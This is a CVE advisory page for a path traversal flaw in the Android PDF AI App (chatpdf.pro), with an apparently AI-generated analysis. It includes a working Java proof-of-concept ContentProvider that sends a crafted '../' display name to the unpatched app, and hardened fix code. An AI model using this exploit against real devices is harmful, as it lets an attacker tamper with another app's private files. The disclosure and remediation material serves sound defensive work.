VYPR
Medium severity (4.4) · NVD Advisory · Published Jun 6, 2026

CVE-2026-11411

Description

Path traversal in iAI Lab PDF AI App allows arbitrary file creation in app's private storage via crafted intents.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A path traversal vulnerability exists in iAI Lab PDF AI App (Android package chatpdf.pro), in the file-import code path that the advisory identifies as getExternalCacheDir (the Android Context API that returns the app's external cache directory). The app reads the _display_name metadata of an incoming content:// URI and uses it verbatim as the destination filename under its private storage, without stripping path separators or ".." components. The affected version is reported as 4.21.0; the reference also notes testing on 4.22.0, so later releases are likely affected as well [1].

Exploitation

An attacker exploits this by hosting a content:// URI in a malicious ContentProvider and sending it to PDF AI App in a file-share intent (e.g., ACTION_SEND or ACTION_VIEW). Because the attacker's provider answers the victim's metadata query, the attacker fully controls the _display_name value. A display name containing directory traversal sequences (e.g., ../) causes the app to create the file at an attacker-chosen path inside its own private storage, internal or external, creating intermediate directories as needed [1]. The attack is local: the attacker needs a component on the same device, typically a malicious app, that is able to send an intent to the victim app [1].
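The attacker side of the exchange above, as an added illustration that is not part of the advisory or its reference. It is a minimal Android ContentProvider that answers the victim's OpenableColumns query with a crafted _display_name and then shares the URI via ACTION_SEND. The provider authority, the payload path and the assumption that the victim handles ACTION_SEND for application/pdf are illustrative choices; the victim package name chatpdf.pro and the _display_name vector come from the advisory.

```java
// Added example (not from the advisory or the vendor): proof-of-concept
// provider for the crafted-intent vector described above.
// Assumptions: authority "com.example.pocprovider", the traversal target
// path, and that the victim exposes an ACTION_SEND handler for PDFs.
package com.example.pocprovider;

import android.content.ContentProvider;
import android.content.ContentValues;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.database.MatrixCursor;
import android.net.Uri;
import android.os.ParcelFileDescriptor;
import android.provider.OpenableColumns;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class PocProvider extends ContentProvider {
    static final String AUTHORITY = "com.example.pocprovider";   // assumption
    static final String VICTIM_PACKAGE = "chatpdf.pro";          // from the advisory

    // OpenableColumns.DISPLAY_NAME is the literal "_display_name" the victim
    // reads. Relative to the victim's external cache directory, this name
    // climbs out of cache/ and creates a sibling directory; the concrete
    // target is an assumption chosen to show the primitive, not a known file.
    static final String PAYLOAD_NAME = "../../../poc/escaped.txt";

    @Override public boolean onCreate() { return true; }

    // The victim queries the URI for its display name; we hand back the
    // traversal string instead of a plain filename.
    @Override
    public Cursor query(Uri uri, String[] projection, String selection,
                        String[] selectionArgs, String sortOrder) {
        MatrixCursor c = new MatrixCursor(
                new String[] { OpenableColumns.DISPLAY_NAME, OpenableColumns.SIZE });
        c.addRow(new Object[] { PAYLOAD_NAME, 4L });
        return c;
    }

    // Bytes the victim will copy to the traversed destination.
    @Override
    public ParcelFileDescriptor openFile(Uri uri, String mode) throws FileNotFoundException {
        File f = new File(getContext().getCacheDir(), "payload.bin");
        try (FileOutputStream out = new FileOutputStream(f)) {
            out.write("PoC\n".getBytes(StandardCharsets.UTF_8));
        } catch (IOException e) {
            throw new FileNotFoundException(e.getMessage());
        }
        return ParcelFileDescriptor.open(f, ParcelFileDescriptor.MODE_READ_ONLY);
    }

    @Override public String getType(Uri uri) { return "application/pdf"; }
    @Override public Uri insert(Uri uri, ContentValues v) { return null; }
    @Override public int delete(Uri uri, String s, String[] a) { return 0; }
    @Override public int update(Uri uri, ContentValues v, String s, String[] a) { return 0; }

    // Deliver the URI to the victim with a file-share intent, granting it
    // read access so its ContentResolver can open our stream.
    public static void sendToVictim(Context ctx) {
        Uri doc = Uri.parse("content://" + AUTHORITY + "/doc");
        Intent i = new Intent(Intent.ACTION_SEND);
        i.setType("application/pdf");
        i.setPackage(VICTIM_PACKAGE);
        i.putExtra(Intent.EXTRA_STREAM, doc);
        i.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
        ctx.startActivity(i);
    }
}
```

The provider must be declared in the attacker app's manifest with android:exported="true" (or android:grantUriPermissions="true") so the victim can resolve and open it. After sending, the file creation can be confirmed on a rooted or debuggable test device by listing /sdcard/Android/data/chatpdf.pro/ and /data/data/chatpdf.pro/ for the path the display name selects.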

Impact

Successful exploitation allows an attacker to create arbitrary files within the victim application's private storage, including the internal storage (/data/data/chatpdf.pro/) and external app-private storage (/sdcard/Android/data/chatpdf.pro/). This includes the ability to create intermediate directories at any depth. Since all filesystem operations execute within the victim app's security context, this could lead to the overwriting of sensitive application files, configuration data, or potentially facilitate further attacks, depending on what files are created or overwritten [1].

Mitigation

The vendor was contacted early in the disclosure process but did not respond. No patched version or specific mitigation has been disclosed in the available references. Because exploitation requires a local component able to send an intent to PDF AI App, the practical device-side mitigation until a fix ships is to avoid installing untrusted applications alongside it. The application is distributed through the Play Store [1].
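Since no vendor fix is available, the following is an added example of the developer-side correction for this bug class; it is not the vendor's code and does not reflect a known patch. It places the pattern the advisory describes (display name joined to getExternalCacheDir and used as-is) beside a hardened version that keeps only the last path element, rejects dot names, and confirms the canonical destination still lies under the cache directory. The class and method names are illustrative.

```java
// Added example (not from the vendor): vulnerable vs. hardened handling of
// an incoming content:// URI's _display_name. Names are assumptions.
package com.example.receiver;

import android.content.ContentResolver;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.provider.OpenableColumns;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public final class SafeImport {
    private SafeImport() {}

    // Ask the sending provider for OpenableColumns.DISPLAY_NAME ("_display_name").
    // A malicious provider controls this value entirely.
    static String displayName(ContentResolver cr, Uri uri) {
        try (Cursor c = cr.query(uri, new String[] { OpenableColumns.DISPLAY_NAME },
                                 null, null, null)) {
            if (c != null && c.moveToFirst()) {
                String n = c.getString(0);
                if (n != null) return n;
            }
        }
        return "document.pdf";
    }

    // VULNERABLE pattern, as described in the advisory: "../../x" is joined to
    // the cache directory unchanged, so the write lands wherever the name says.
    static File vulnerableDestination(Context ctx, Uri uri) {
        File dir = ctx.getExternalCacheDir();
        return new File(dir, displayName(ctx.getContentResolver(), uri));
    }

    // HARDENED: reduce the name to its final element, reject empty/dot/NUL
    // names, then verify the canonical path is still inside the directory.
    static File safeDestination(Context ctx, Uri uri) throws IOException {
        File dir = ctx.getExternalCacheDir();
        if (dir == null) throw new IOException("external cache unavailable");
        String raw = displayName(ctx.getContentResolver(), uri);
        String base = new File(raw).getName();   // "../../x.pdf" -> "x.pdf"
        if (base.isEmpty() || base.equals(".") || base.equals("..")
                || base.indexOf('\0') >= 0) {
            throw new IOException("rejected display name: " + raw);
        }
        File dest = new File(dir, base);
        String dirCanon = dir.getCanonicalPath() + File.separator;
        if (!dest.getCanonicalPath().startsWith(dirCanon)) {
            throw new IOException("path escapes cache dir: " + raw);
        }
        return dest;
    }

    // Copy the shared stream to the validated destination.
    static void copy(Context ctx, Uri uri, File dest) throws IOException {
        try (InputStream in = ctx.getContentResolver().openInputStream(uri);
             OutputStream out = new FileOutputStream(dest)) {
            if (in == null) throw new IOException("cannot open " + uri);
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) > 0) out.write(buf, 0, n);
        }
    }
}
```

The canonical-path check is the part that matters: getName() alone would miss a name that is a bare ".." and would not catch a symlink already present in the directory, while the startsWith test on getCanonicalPath() rejects both. A stricter design avoids the problem entirely by generating the on-disk filename itself (for example a random identifier) and keeping the sender's display name only as metadata.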

AI Insight generated on Jun 6, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 3

Patches: 0 (no patches discovered yet)

Vulnerability mechanics

No source-code context is available for this CVE. The mechanics section is only generated when the actual fix diff can be read; without it, the four parts (root cause, attack vector, affected code, fix) would be speculation rather than analysis.

References: 4

News mentions: 0 (no linked articles in our index yet)